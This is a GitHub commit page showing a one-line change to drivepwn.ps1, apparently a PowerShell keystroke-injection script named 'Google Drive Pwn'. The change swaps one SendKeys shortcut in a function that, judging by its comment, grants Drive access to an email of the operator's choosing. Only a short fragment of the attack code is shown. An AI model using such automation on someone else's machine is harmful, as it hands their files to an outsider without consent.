Skip to content

Commit ec184d4

Browse files
authored
Update drivepwn.ps1
1 parent c97e795 commit ec184d4

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Google Drive Pwn/drivepwn.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ function Access-Drive {
1919
[System.Windows.Forms.SendKeys]::SendWait("^(a)")
2020
Start-Sleep -Milliseconds 400
2121

22-
[System.Windows.Forms.SendKeys]::SendWait(".")
22+
[System.Windows.Forms.SendKeys]::SendWait("^%a")
2323
Start-Sleep -Seconds 1.5
2424

2525
# Enter email you want to grant access for

0 commit comments

Comments
 (0)